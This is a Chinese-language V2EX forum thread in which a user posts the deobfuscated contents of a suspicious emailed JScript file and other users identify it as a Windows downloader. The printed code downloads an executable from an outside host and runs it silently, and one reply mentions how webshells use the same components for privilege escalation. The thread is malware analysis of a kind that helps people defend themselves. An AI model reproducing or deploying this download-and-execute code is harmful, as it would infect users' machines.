邮箱里收到了这么一个陌生 js 脚本,请问这个脚本是病毒么?

2017-05-13 14:31:33 +08:00
 hjq98765

原文件是一长串乱码,原作者往里面故意添加了许多无意义字符串,删掉那些无意义字符串之后,最终有意义的代码如下:

var wsh = new ActiveXObject("wscript.shell");
var sh = new ActiveXObject("shell.application");
var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
var Stream = new ActiveXObject("ADODB.Stream");
var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
HTTP.Open("GET", "http://mopooland.top/404", false);
HTTP.Send();
if (HTTP.Status == 200) {
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(HTTP.ResponseBody); 
    Stream.Position = 0;
    Stream.SaveToFile(path, 2);
    Stream.Close(); sh.ShellExecute(path, "", "", "open", 1);
}

http://mopooland.top/404打开里面什么都没有,求懂 js 的大神帮忙解释一下这个代码是要干嘛?是跟最近卷土重来的比特币病毒有关么?

原代码见:http://pan.baidu.com/s/1kUComnP

4733 次点击
所在节点    JavaScript
8 条回复
liangch
2017-05-13 14:36:22 +08:00
http://mopooland.top/404 一个可执行的文件
lbb9432
2017-05-13 14:51:01 +08:00
Pastsong
2017-05-13 14:51:20 +08:00
Name:Robert Ruthven
Organization:Gamblin Artists Colors
Street:323 SE Division Pl
City:Portland
State:OR
Postal Code:97202
Country:US
Phone:+1.5034359411
Fax:+1.5034359411
Email:email@mail.com

Whois 都是假信息
Pastsong
2017-05-13 14:52:15 +08:00
Email: jenniemarc@mail.com
aristotll
2017-05-13 17:29:49 +08:00
估计用的 是 IE 那一套下载东西
noe132
2017-05-13 17:33:12 +08:00
@aristotll 估计是 windows 下的 js 运行环境。
crazyskyangel
2017-05-13 21:22:07 +08:00
WScript 中的 JScript 脚本,就是利用 Windows 脚本系统做的病毒下载执行器。
只要杀毒软件的主动防御好点就能防住,如果是免杀,用户懂点规则也启动不了。
Mayter
2017-05-14 12:24:22 +08:00
别的我不太清楚,但是拿到 webshell(asp,或者 aspx,asp 居多)提权的时候需要看 wscript.shell shell.application 这两个组件才可以执行系统命令,进而可以执行提权文件进行提权。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/361080

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX